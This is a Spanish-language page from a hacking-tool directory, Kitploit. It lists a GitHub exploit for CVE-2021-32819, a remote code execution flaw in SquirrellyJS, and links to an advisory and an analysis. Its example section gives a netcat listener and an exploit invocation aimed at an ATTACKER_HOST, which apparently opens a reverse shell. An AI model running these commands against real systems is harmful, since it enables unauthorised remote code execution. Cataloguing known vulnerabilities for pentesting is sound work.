Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-32819 — SquirrellyJS mezcla datos de plantilla pura con opciones de configuración del motor a través de la API de renderizado de Express. Al sobrescribir opciones de configuración internas, se puede desencadenar la ejecución remota de código en aplicaciones posteriores. | Kitploit
Herramientas/GitHubGitHub/abady0x1/cve-2021-32819
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebHerramienta de Acceso Remoto
GitHubabady0x1/cve-2021-32819

CVE-2021-32819

SquirrellyJS mezcla datos de plantilla pura con opciones de configuración del motor a través de la API de renderizado de Express. Al sobrescribir opciones de configuración internas, se puede desencadenar la ejecución remota de código en aplicaciones posteriores.

Ver Repositorio
1012hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-32819

CVE-2021-32819 : SquirrellyJS mezcla datos de plantilla pura con opciones de configuración del motor a través de la API de renderizado de Express. Al sobrescribir opciones de configuración interna, se puede desencadenar ejecución remota de código en aplicaciones posteriores.

Fuente

https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/

Análisis

https://blog.diefunction.io/vulnerabilities/ghsl-2021-023

squirrelly

v8.0.0 >= v8.0.8 Ejecución remota de código

Entorno

Ubuntu 20.04.1

Ejemplo

root@kitploit:~
nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443

Prueba de concepto

Descargar herramienta